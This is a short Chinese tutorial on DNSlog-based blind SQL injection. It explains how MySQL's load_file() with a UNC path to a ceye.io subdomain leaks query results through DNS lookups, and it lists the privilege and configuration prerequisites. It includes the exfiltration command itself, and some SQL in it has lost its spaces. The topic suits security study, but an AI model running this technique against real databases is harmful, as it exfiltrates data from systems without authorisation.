7.SQL注入之DNSlog盲注

1.什么是DNS在Internet上域名与IP地址之间是一对一（或者多对一）的，域名虽然便于人们记忆，但机器之间只能互相认识IP地址，它们之间的转换工作称为域名解析，域名解析需要由专门的域名解析服务器来完成，DNS就是进行域名解析的服务器。

用法也很简单，只要有账户，便会给你提供一个二级域名XXX.ceye.io，我们只要将信息放在三级域名那就可以收到信息了。我们只需要下图在红框出写入我们的SQL查询语句，查询的结果就会显示在DNSlog平台的日志里。

注：1红框类容不能含有特殊字符2目标服务器必须是windows服务器（3.就以sql盲注为例。深入理解下DNSlog注入过程：通过DNSlog盲注需要用的load_file()函数，所以一般得是root权限。showvariableslike'%secure%';查看load_file()可以读取的磁盘。1、当secure_file_priv为空，就可以读取磁盘的目录。

通过设置my.ini来配置。secure_file_priv=

在mysql命令行执行：selectload_file('\\afanti.wvax23.ceye.io\aaa');其中afanti就是要注入的查询语句查看平台，dnsLog被记录下来。

load_file()函数可以通过dns解析请求。

查看dnslog日志，发现security数据库被查询出来：